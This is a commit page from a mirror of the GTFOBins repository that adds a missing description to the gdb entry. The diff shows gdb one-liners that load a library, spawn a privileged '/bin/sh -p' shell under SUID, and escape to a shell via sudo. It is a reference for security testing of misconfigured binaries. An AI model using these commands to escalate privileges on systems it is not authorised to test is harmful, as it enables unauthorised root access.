mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add missing description to gdb sudo
This commit is contained in:
parent
31be45fbde
commit
732e4f9ae4
@ -48,7 +48,8 @@ functions:
|
||||
- description: This requires that GDB is compiled with Python support.
|
||||
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
|
||||
suid:
|
||||
- code: ./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
|
||||
- description: This requires that GDB is compiled with Python support.
|
||||
code: ./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
|
||||
sudo:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
capabilities:
|
||||
|
Loading…
Reference in New Issue
Block a user